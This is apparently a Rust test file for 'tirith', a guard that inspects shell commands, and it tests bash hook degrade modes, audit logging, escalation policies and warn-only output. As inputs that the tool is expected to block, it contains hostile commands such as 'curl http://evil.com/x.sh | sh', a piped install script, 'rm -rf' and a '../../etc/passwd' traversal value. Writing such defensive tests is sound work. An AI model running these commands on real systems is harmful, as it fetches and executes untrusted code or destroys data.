    let rest = &first[idx + marker.len()..];
    let major = rest.split('.').next()?.trim().parse::<u32>().ok()?;
    Some(major)
}

#[cfg(unix)]
#[test]
fn bash_hook_startup_gate_degrade_persists() {
    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");

    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );

    // `bash --norc --noprofile -i -c` is interactive enough for enter mode
    // to activate while skipping user config that might set
    // _TIRITH_BASH_LOADED. _TIRITH_TEST_FAIL_HEALTH=1 forces the startup
    // health gate to fail.
    let script =
        format!("_TIRITH_TEST_FAIL_HEALTH=1; source '{hook}'; printf '%s' \"$_TIRITH_BASH_MODE\"");
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-i", "-c", &script])
        .env("XDG_STATE_HOME", tmpdir.path())
        .env_remove("TIRITH_BASH_MODE")
        .env_remove("SSH_CONNECTION")
        .env_remove("SSH_TTY")
        .env_remove("SSH_CLIENT")
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert_eq!(
        stdout, "preexec",
        "health gate failure should degrade to preexec"
    );

    let flag = tmpdir.path().join("tirith/bash-safe-mode");
    assert!(
        flag.exists(),
        "safe-mode flag should be persisted after degrade"
    );

    // Re-source in a fresh shell; the persisted flag forces preexec.
    let script2 = format!(
        "unset TIRITH_BASH_MODE; unset SSH_CONNECTION; unset SSH_TTY; unset SSH_CLIENT; source '{hook}'; printf '%s' \"$_TIRITH_BASH_MODE\""
    );
    let out2 = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script2])
        .env("XDG_STATE_HOME", tmpdir.path())
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    let stdout2 = String::from_utf8_lossy(&out2.stdout);
    assert_eq!(
        stdout2, "preexec",
        "subsequent shells should start in preexec from persisted flag"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_runtime_delivery_failure_degrades_in_pty() {
    if !expect_available() {
        eprintln!("skipping PTY test: expect not available");
        return;
    }
    if bash_major_version().map(|v| v < 5).unwrap_or(true) {
        eprintln!("skipping PTY test: requires bash >= 5");
        return;
    }

    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");
    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );

    // Drive the runtime _tirith_enter failure path in a real interactive
    // PTY:
    //   1. start in enter mode (startup gate bypassed for this test),
    //   2. break PROMPT_COMMAND delivery by making it readonly without the
    //      tirith hook,
    //   3. press Enter on a command and assert the auto-degrade message
    //      appears.
    let expect_script = r#"
set timeout 20
set hook $env(HOOK_PATH)
spawn -noecho bash --norc --noprofile -i
expect -re {[$#] $}
send -- "export PS1='PROMPT> '\r"
expect "PROMPT> "
send -- "source '$hook'\r"
expect "PROMPT> "
send -- "PROMPT_COMMAND=':'; readonly PROMPT_COMMAND\r"
expect "PROMPT> "
send -- "echo PTY_RUNTIME_CHECK\r"
expect {
  -re {switching to preexec} {}
  timeout { exit 2 }
}
send -- "\r"
expect "PROMPT> "
send -- "exit\r"
expect eof
"#;

    let out = Command::new("expect")
        .args(["-c", expect_script])
        .env("HOOK_PATH", &hook)
        .env("XDG_STATE_HOME", tmpdir.path())
        .env("_TIRITH_TEST_SKIP_HEALTH", "1")
        .env_remove("TIRITH_BASH_MODE")
        .env_remove("SSH_CONNECTION")
        .env_remove("SSH_TTY")
        .env_remove("SSH_CLIENT")
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run expect");

    assert!(
        out.status.success(),
        "expect-driven PTY test failed (code {:?})\nstdout:\n{}\nstderr:\n{}",
        out.status.code(),
        String::from_utf8_lossy(&out.stdout),
        String::from_utf8_lossy(&out.stderr)
    );

    let flag = tmpdir.path().join("tirith/bash-safe-mode");
    assert!(
        flag.exists(),
        "runtime delivery failure should persist safe-mode flag"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_noninteractive_no_safe_mode_flag() {
    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");

    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let script = format!(
        "unset TIRITH_BASH_MODE; unset SSH_CONNECTION; unset SSH_TTY; unset SSH_CLIENT; source '{hook}'"
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env("XDG_STATE_HOME", tmpdir.path())
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let flag = tmpdir.path().join("tirith/bash-safe-mode");
    assert!(
        !flag.exists(),
        "non-interactive sourcing should never write safe-mode flag"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_noninteractive_no_debug_trap() {
    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let script = format!(
        "unset TIRITH_BASH_MODE; unset SSH_CONNECTION; unset SSH_TTY; unset SSH_CLIENT; source '{hook}'; trap -p DEBUG"
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert!(
        stdout.trim().is_empty(),
        "non-interactive sourcing should not install DEBUG trap, got: {stdout}"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_noninteractive_mode_is_enter() {
    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");
    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let script = format!(
        "unset TIRITH_BASH_MODE; unset SSH_CONNECTION; unset SSH_TTY; unset SSH_CLIENT; source '{hook}'; printf '%s' \"$_TIRITH_BASH_MODE\""
    );
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", &script])
        .env("XDG_STATE_HOME", tmpdir.path())
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run bash");
    assert_eq!(out.status.code(), Some(0));
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert_eq!(
        stdout, "enter",
        "non-interactive enter mode: variable is set but nothing installed"
    );
}

#[test]
fn auto_checkpoint_cli_wiring_compiles_and_runs() {
    // Smoke test for the auto-checkpoint CLI wiring. The create-then-purge
    // logic is covered by `tirith_core::checkpoint::tests`; here we only
    // confirm `tirith check --interactive` invokes that path cleanly on a
    // destructive command.
    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");
    let workdir = tmpdir.path().join("project");
    fs::create_dir_all(&workdir).unwrap();
    fs::write(workdir.join("important.txt"), "do not delete").unwrap();

    let state_dir = tmpdir.path().join("state");

    let out = tirith()
        .args([
            "check",
            "--shell",
            "posix",
            "--interactive",
            "--",
            "rm -rf tempstuff",
        ])
        .env("XDG_STATE_HOME", &state_dir)
        .current_dir(&workdir)
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(0), "rm -rf should be allowed");

    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        !stderr.contains("auto-checkpoint failed"),
        "auto-checkpoint should not report errors, got: {stderr}"
    );
}

#[cfg(unix)]
fn prepare_read_only_audit_log() -> (tempfile::TempDir, PathBuf) {
    use std::os::unix::fs::PermissionsExt;

    let tmpdir = tempfile::tempdir().expect("tempdir");
    let data_home = tmpdir.path().join("xdg-data");
    let tirith_dir = data_home.join("tirith");
    fs::create_dir_all(&tirith_dir).expect("create tirith data dir");

    let log_path = tirith_dir.join("log.jsonl");
    fs::write(&log_path, "{}\n").expect("seed audit log");
    fs::set_permissions(&log_path, std::fs::Permissions::from_mode(0o400))
        .expect("make audit log read-only");

    (tmpdir, data_home)
}

#[cfg(unix)]
fn run_check_with_audit_failure(debug: bool) -> std::process::Output {
    let (tmpdir, data_home) = prepare_read_only_audit_log();

    let mut cmd = tirith();
    cmd.env("XDG_DATA_HOME", &data_home)
        .env("APPDATA", tmpdir.path())
        .args([
            "check",
            "--shell",
            "posix",
            "--non-interactive",
            "--",
            "curl https://example.com/install.sh | bash",
        ]);
    if debug {
        cmd.env("TIRITH_AUDIT_DEBUG", "1");
    }

    cmd.output().expect("failed to run tirith check")
}

#[cfg(unix)]
fn run_paste_with_audit_failure(debug: bool) -> std::process::Output {
    let (tmpdir, data_home) = prepare_read_only_audit_log();

    let mut cmd = tirith();
    cmd.env("XDG_DATA_HOME", &data_home)
        .env("APPDATA", tmpdir.path())
        .args(["paste", "--shell", "posix", "--non-interactive"])
        .stdin(std::process::Stdio::piped())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped());
    if debug {
        cmd.env("TIRITH_AUDIT_DEBUG", "1");
    }

    let mut child = cmd.spawn().expect("failed to spawn tirith paste");
    child
        .stdin
        .take()
        .expect("stdin pipe")
        .write_all(b"curl https://example.com/install.sh | bash")
        .expect("write paste input");
    child.wait_with_output().expect("wait on tirith paste")
}

#[cfg(unix)]
fn run_check_with_last_trigger_failure(debug: bool) -> std::process::Output {
    let tmpdir = tempfile::tempdir().expect("tempdir");
    let fake_data_home = tmpdir.path().join("xdg-data-file");
    fs::write(&fake_data_home, "not a directory").expect("seed fake XDG data home");

    let mut cmd = tirith();
    cmd.env("XDG_DATA_HOME", &fake_data_home)
        .env("APPDATA", tmpdir.path())
        .env("TIRITH_LOG", "0")
        .args([
            "check",
            "--shell",
            "posix",
            "--non-interactive",
            "--",
            "curl https://example.com/install.sh | bash",
        ]);
    if debug {
        cmd.env("TIRITH_AUDIT_DEBUG", "1");
    }

    cmd.output().expect("failed to run tirith check")
}

#[cfg(unix)]
#[test]
fn check_audit_failures_are_silent_by_default() {
    let out = run_check_with_audit_failure(false);

    assert_eq!(
        out.status.code(),
        Some(1),
        "blocked command should still exit 1"
    );
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("BLOCKED"),
        "check output should still show the verdict, got: {stderr}"
    );
    assert!(
        !stderr.contains("tirith: audit:"),
        "audit diagnostics should be suppressed by default, got: {stderr}"
    );
}

#[cfg(unix)]
#[test]
fn check_audit_failures_are_visible_with_debug_env() {
    let out = run_check_with_audit_failure(true);

    assert_eq!(
        out.status.code(),
        Some(1),
        "blocked command should still exit 1"
    );
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("tirith: audit:"),
        "debug env should surface audit diagnostics, got: {stderr}"
    );
}

#[cfg(unix)]
#[test]
fn check_last_trigger_failures_are_silent_by_default() {
    let out = run_check_with_last_trigger_failure(false);

    assert_eq!(
        out.status.code(),
        Some(1),
        "blocked command should still exit 1"
    );
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("BLOCKED"),
        "check output should still show the verdict, got: {stderr}"
    );
    assert!(
        !stderr.contains("cannot create data dir"),
        "last_trigger diagnostics should be suppressed by default, got: {stderr}"
    );
}

#[cfg(unix)]
#[test]
fn check_last_trigger_failures_are_visible_with_debug_env() {
    let out = run_check_with_last_trigger_failure(true);

    assert_eq!(
        out.status.code(),
        Some(1),
        "blocked command should still exit 1"
    );
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("cannot create data dir"),
        "debug env should surface last_trigger diagnostics, got: {stderr}"
    );
}

#[cfg(unix)]
#[test]
fn paste_audit_failures_are_silent_by_default() {
    let out = run_paste_with_audit_failure(false);

    assert_eq!(
        out.status.code(),
        Some(1),
        "blocked paste should still exit 1"
    );
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("BLOCKED"),
        "paste output should still show the verdict, got: {stderr}"
    );
    assert!(
        !stderr.contains("tirith: audit:"),
        "audit diagnostics should be suppressed by default, got: {stderr}"
    );
}

#[cfg(unix)]
#[test]
fn paste_audit_failures_are_visible_with_debug_env() {
    let out = run_paste_with_audit_failure(true);

    assert_eq!(
        out.status.code(),
        Some(1),
        "blocked paste should still exit 1"
    );
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("tirith: audit:"),
        "debug env should surface audit diagnostics, got: {stderr}"
    );
}

#[cfg(unix)]
#[test]
fn paste_oversized_input_rejected() {
    use std::io::Write;

    let mut child = Command::new(env!("CARGO_BIN_EXE_tirith"))
        .args(["paste", "--shell", "posix"])
        .stdin(std::process::Stdio::piped())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .spawn()
        .expect("failed to spawn tirith");

    let data = vec![b'A'; 1024 * 1024 + 100];
    child.stdin.take().unwrap().write_all(&data).unwrap();

    let out = child.wait_with_output().unwrap();
    assert_eq!(out.status.code(), Some(1), "paste >1MiB should exit 1");
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("1 MiB"),
        "stderr should mention 1 MiB limit, got: {stderr}"
    );
}

#[test]
fn receipt_verify_invalid_sha256_rejected() {
    let out = tirith()
        .args(["receipt", "verify", "../../etc/passwd"])
        .output()
        .expect("failed to run tirith");
    assert_ne!(
        out.status.code(),
        Some(0),
        "path traversal sha256 should be rejected"
    );
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("invalid sha256"),
        "stderr should mention invalid sha256, got: {stderr}"
    );
}

#[cfg(unix)]
#[test]
fn bash_hook_unexpected_rc_logic_test() {
    // Pure structural check of the if/elif/else branching for exit codes.
    let script = r#"
for rc in 0 1 2 137; do
  if [[ $rc -eq 0 ]]; then
    printf "rc=%d:ALLOW\n" "$rc"
  elif [[ $rc -eq 2 ]]; then
    printf "rc=%d:WARN\n" "$rc"
  elif [[ $rc -eq 1 ]]; then
    printf "rc=%d:BLOCK\n" "$rc"
  else
    printf "rc=%d:UNEXPECTED\n" "$rc"
  fi
done
"#;
    let out = Command::new("bash")
        .args(["--norc", "--noprofile", "-c", script])
        .output()
        .expect("failed to run bash");
    let stdout = String::from_utf8_lossy(&out.stdout);
    assert!(stdout.contains("rc=0:ALLOW"), "rc=0 should ALLOW");
    assert!(stdout.contains("rc=1:BLOCK"), "rc=1 should BLOCK");
    assert!(stdout.contains("rc=2:WARN"), "rc=2 should WARN");
    assert!(
        stdout.contains("rc=137:UNEXPECTED"),
        "rc=137 should be UNEXPECTED"
    );
}

#[cfg(unix)]
#[test]
fn zsh_unexpected_rc_branch_logic_test() {
    let script = r#"
rc=137
if [[ $rc -eq 0 ]]; then echo ALLOW
elif [[ $rc -eq 2 ]]; then echo WARN
elif [[ $rc -eq 1 ]]; then echo BLOCK
else echo UNEXPECTED; fi
"#;
    let out = Command::new("zsh").args(["-c", script]).output();
    match out {
        Ok(out) => {
            let stdout = String::from_utf8_lossy(&out.stdout);
            assert!(
                stdout.trim() == "UNEXPECTED",
                "zsh rc=137 should be UNEXPECTED, got: {stdout}"
            );
        }
        Err(_) => {
            eprintln!("skipping zsh branch test: zsh not available");
        }
    }
}

#[cfg(unix)]
#[test]
fn fish_unexpected_rc_branch_logic_test() {
    let script = r#"set rc 137
if test $rc -eq 0; echo ALLOW
else if test $rc -eq 2; echo WARN
else if test $rc -eq 1; echo BLOCK
else; echo UNEXPECTED; end"#;
    let out = Command::new("fish").args(["-c", script]).output();
    match out {
        Ok(out) => {
            let stdout = String::from_utf8_lossy(&out.stdout);
            assert!(
                stdout.trim() == "UNEXPECTED",
                "fish rc=137 should be UNEXPECTED, got: {stdout}"
            );
        }
        Err(_) => {
            eprintln!("skipping fish branch test: fish not available");
        }
    }
}

#[cfg(unix)]
#[test]
fn bash_hook_unexpected_rc_degrades_in_pty() {
    if !expect_available() {
        eprintln!("skipping PTY test: expect not available");
        return;
    }
    if bash_major_version().map(|v| v < 5).unwrap_or(true) {
        eprintln!("skipping PTY test: requires bash >= 5");
        return;
    }

    let tmpdir = tempfile::tempdir().expect("failed to create tmpdir");
    let hook = format!(
        "{}/assets/shell/lib/bash-hook.bash",
        env!("CARGO_MANIFEST_DIR")
    );
    let marker = tmpdir.path().join("marker");

    let fake_tirith = tmpdir.path().join("tirith");
    fs::write(&fake_tirith, "#!/bin/sh\nexit 137\n").unwrap();
    #[cfg(unix)]
    {
        use std::os::unix::fs::PermissionsExt;
        fs::set_permissions(&fake_tirith, std::fs::Permissions::from_mode(0o755)).unwrap();
    }

    let marker_str = marker.display().to_string();
    let fake_dir = tmpdir.path().display().to_string();

    let expect_script = format!(
        r#"
set timeout 20
set hook "{hook}"
set marker "{marker_str}"
set fake_dir "{fake_dir}"
spawn -noecho bash --norc --noprofile -i
expect -re {{[$#] $}}
send -- "export PS1='PROMPT> '\r"
expect "PROMPT> "
send -- "export PATH=$fake_dir:$PATH\r"
expect "PROMPT> "
send -- "export TIRITH_BASH_MODE=enter\r"
expect "PROMPT> "
send -- "export _TIRITH_TEST_SKIP_HEALTH=1\r"
expect "PROMPT> "
send -- "source '$hook'\r"
expect "PROMPT> "
send -- "touch $marker\r"
sleep 1
send -- "\x15"
sleep 0.5
send -- "echo MODE=$_TIRITH_BASH_MODE\r"
expect {{
  -re {{MODE=preexec}} {{}}
  timeout {{ exit 2 }}
}}
send -- "exit\r"
expect eof
"#
    );

    let out = Command::new("expect")
        .args(["-c", &expect_script])
        .env("XDG_STATE_HOME", tmpdir.path().join("state"))
        .env_remove("TIRITH_BASH_MODE")
        .env_remove("SSH_CONNECTION")
        .env_remove("SSH_TTY")
        .env_remove("SSH_CLIENT")
        .env_remove("_TIRITH_BASH_LOADED")
        .output()
        .expect("failed to run expect");

    let stdout = String::from_utf8_lossy(&out.stdout);

    assert!(
        !marker.exists(),
        "marker file should not exist — command should not have executed"
    );

    assert!(
        stdout.contains("unexpected exit code") || stdout.contains("switching to preexec"),
        "output should mention degrade reason, got:\n{stdout}"
    );

    assert!(
        stdout.contains("MODE=preexec"),
        "mode should degrade to preexec, got:\n{stdout}"
    );

    let flag = tmpdir.path().join("state/tirith/bash-safe-mode");
    assert!(
        flag.exists(),
        "safe-mode flag should be persisted after unexpected rc degrade"
    );
}

/// Build a tirith Command with session and state isolation.
fn tirith_isolated(
    session_id: &str,
    state_dir: &std::path::Path,
    cwd: &std::path::Path,
) -> Command {
    let mut cmd = tirith();
    cmd.env("TIRITH_SESSION_ID", session_id)
        .env("XDG_STATE_HOME", state_dir)
        .env("TIRITH_LOG", "0")
        .current_dir(cwd);
    cmd
}

#[test]
fn escalation_repeat_count_blocks_at_threshold() {
    let tmpdir = tempfile::tempdir().expect("tempdir");
    let state_dir = tmpdir.path().join("state");
    let policy_dir = tmpdir.path().join("project/.tirith");
    fs::create_dir_all(&policy_dir).unwrap();
    fs::create_dir_all(&state_dir).unwrap();

    let policy = r#"paranoia: 1
escalation:
  - trigger: repeat_count
    rule_ids: ["*"]
    threshold: 3
    action: block
"#;
    fs::write(policy_dir.join("policy.yaml"), policy).unwrap();

    // Policy discovery walks up to `.git`, so seed one.
    fs::create_dir_all(tmpdir.path().join("project/.git")).unwrap();

    let session_id = format!("test-escalation-{}", std::process::id());
    let project_dir = tmpdir.path().join("project");

    let out1 = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args([
            "check",
            "--non-interactive",
            "--no-daemon",
            "--shell",
            "posix",
            "--",
            "curl https://bit.ly/aaa",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(
        out1.status.code(),
        Some(2),
        "1st shortened URL should exit 2 (warn), got stderr: {}",
        String::from_utf8_lossy(&out1.stderr)
    );

    let out2 = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args([
            "check",
            "--non-interactive",
            "--no-daemon",
            "--shell",
            "posix",
            "--",
            "curl https://bit.ly/bbb",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(
        out2.status.code(),
        Some(2),
        "2nd shortened URL should exit 2 (warn), got stderr: {}",
        String::from_utf8_lossy(&out2.stderr)
    );

    let out3 = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args([
            "check",
            "--non-interactive",
            "--no-daemon",
            "--shell",
            "posix",
            "--",
            "curl https://bit.ly/ccc",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(
        out3.status.code(),
        Some(1),
        "3rd shortened URL should exit 1 (escalated to block), got stderr: {}",
        String::from_utf8_lossy(&out3.stderr)
    );
}

#[test]
fn escalation_blocked_not_recorded_as_warning() {
    let tmpdir = tempfile::tempdir().expect("tempdir");
    let state_dir = tmpdir.path().join("state");
    let policy_dir = tmpdir.path().join("project/.tirith");
    fs::create_dir_all(&policy_dir).unwrap();
    fs::create_dir_all(&state_dir).unwrap();

    let policy = r#"paranoia: 1
escalation:
  - trigger: repeat_count
    rule_ids: ["*"]
    threshold: 3
    action: block
"#;
    fs::write(policy_dir.join("policy.yaml"), policy).unwrap();
    fs::create_dir_all(tmpdir.path().join("project/.git")).unwrap();

    let session_id = format!("test-blocked-warn-{}", std::process::id());
    let project_dir = tmpdir.path().join("project");

    for slug in &["aaa", "bbb", "ccc"] {
        let _ = tirith_isolated(&session_id, &state_dir, &project_dir)
            .args([
                "check",
                "--non-interactive",
                "--no-daemon",
                "--shell",
                "posix",
                "--",
                &format!("curl https://bit.ly/{slug}"),
            ])
            .output()
            .expect("failed to run tirith");
    }

    let out = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args(["warnings", "--json", "--session", &session_id])
        .output()
        .expect("failed to run tirith warnings");
    assert_eq!(out.status.code(), Some(0));

    let stdout = String::from_utf8_lossy(&out.stdout);
    let json: serde_json::Value =
        serde_json::from_str(&stdout).expect("warnings --json should be valid JSON");
    assert_eq!(
        json["total_warnings"], 2,
        "only 2 warnings should be recorded (3rd was blocked, not a warning): {json}"
    );
}

#[test]
fn warnings_clear_resets_session() {
    let tmpdir = tempfile::tempdir().expect("tempdir");
    let state_dir = tmpdir.path().join("state");
    let policy_dir = tmpdir.path().join("project/.tirith");
    fs::create_dir_all(&policy_dir).unwrap();
    fs::create_dir_all(&state_dir).unwrap();

    let policy = "paranoia: 1\n";
    fs::write(policy_dir.join("policy.yaml"), policy).unwrap();
    fs::create_dir_all(tmpdir.path().join("project/.git")).unwrap();

    let session_id = format!("test-clear-{}", std::process::id());
    let project_dir = tmpdir.path().join("project");

    let out = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args([
            "check",
            "--non-interactive",
            "--no-daemon",
            "--shell",
            "posix",
            "--",
            "curl https://bit.ly/abc",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(
        out.status.code(),
        Some(2),
        "shortened URL should warn (exit 2)"
    );

    let out = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args(["warnings", "--json", "--session", &session_id])
        .output()
        .expect("failed to run tirith warnings");
    let json: serde_json::Value =
        serde_json::from_str(&String::from_utf8_lossy(&out.stdout)).unwrap();
    assert!(
        json["total_warnings"].as_u64().unwrap() > 0,
        "should have at least one warning before clear"
    );

    let out = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args(["warnings", "--clear", "--session", &session_id])
        .output()
        .expect("failed to run tirith warnings --clear");
    assert_eq!(out.status.code(), Some(0));

    let out = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args(["warnings", "--json", "--session", &session_id])
        .output()
        .expect("failed to run tirith warnings after clear");
    let json: serde_json::Value =
        serde_json::from_str(&String::from_utf8_lossy(&out.stdout)).unwrap();
    assert_eq!(
        json["total_warnings"], 0,
        "warnings should be 0 after clear: {json}"
    );
}

#[test]
fn paranoia_filters_low_finding_to_allow() {
    let tmpdir = tempfile::tempdir().expect("tempdir");
    let state_dir = tmpdir.path().join("state");
    let policy_dir = tmpdir.path().join("project/.tirith");
    fs::create_dir_all(&policy_dir).unwrap();
    fs::create_dir_all(&state_dir).unwrap();

    // paranoia 1 + LOW override for shortened_url filters the finding out.
    let policy = r#"paranoia: 1
severity_overrides:
  shortened_url: LOW
"#;
    fs::write(policy_dir.join("policy.yaml"), policy).unwrap();
    fs::create_dir_all(tmpdir.path().join("project/.git")).unwrap();

    let session_id = format!("test-paranoia-low-{}", std::process::id());
    let project_dir = tmpdir.path().join("project");

    let out = tirith_isolated(&session_id, &state_dir, &project_dir)
        .args([
            "check",
            "--non-interactive",
            "--no-daemon",
            "--shell",
            "posix",
            "--",
            "curl https://bit.ly/x",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(
        out.status.code(),
        Some(0),
        "LOW finding at paranoia=1 should be filtered to Allow (exit 0), got stderr: {}",
        String::from_utf8_lossy(&out.stderr)
    );
}

#[test]
fn check_warn_only_block_renders_as_detected() {
    let out = tirith()
        .args([
            "check",
            "--warn-only",
            "--shell",
            "posix",
            "--",
            "curl http://evil.com/x.sh | sh",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(
        out.status.code(),
        Some(1),
        "exit code stays 1 in warn-only mode; the flag is human-rendering-only"
    );
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        !stderr.contains("BLOCKED"),
        "warn-only mode must not use 'BLOCKED' banner — got: {stderr}"
    );
    assert!(
        stderr.contains("DETECTED"),
        "warn-only mode must render block verdicts as DETECTED — got: {stderr}"
    );
}

#[test]
fn check_without_warn_only_still_renders_blocked() {
    let out = tirith()
        .args([
            "check",
            "--shell",
            "posix",
            "--",
            "curl http://evil.com/x.sh | sh",
        ])
        .output()
        .expect("failed to run tirith");
    assert_eq!(out.status.code(), Some(1));
    let stderr = String::from_utf8_lossy(&out.stderr);
    assert!(
        stderr.contains("BLOCKED"),
        "default mode must use BLOCKED banner — got: {stderr}"
    );
    assert!(
        !stderr.contains("DETECTED"),
        "default mode must not render DETECTED — got: {stderr}"
    );
}

#[test]
fn warn_only_json_output_matches_plain_when_timings_stripped() {
    // The --warn-only flag only affects human rendering. Machine output
    // (JSON, audit, webhook) must be byte-identical to the un-flagged run
    // after stripping the per-run `timings_ms` field.
    let input = "curl http://evil.com/x.sh | sh";
    let with_flag = tirith()
        .args([
            "check",
            "--warn-only",
            "--json",
            "--shell",
            "posix",
            "--",
            input,
        ])
        .output()
        .expect("tirith with --warn-only");
    let without_flag = tirith()
        .args(["check", "--json", "--shell", "posix", "--", input])
        .output()
        .expect("tirith without --warn-only");

    let strip = |bytes: &[u8]| -> serde_json::Value {
        let mut v: serde_json::Value = serde_json::from_slice(bytes).expect("parse JSON");
        if let Some(obj) = v.as_object_mut() {
            obj.remove("timings_ms");
        }
        v
    };
    assert_eq!(
        strip(&with_flag.stdout),
        strip(&without_flag.stdout),
        "JSON must be identical except for timings_ms"
    );
    assert_eq!(
        with_flag.status.code(),
        without_flag.status.code(),
        "exit codes must match"
    );
}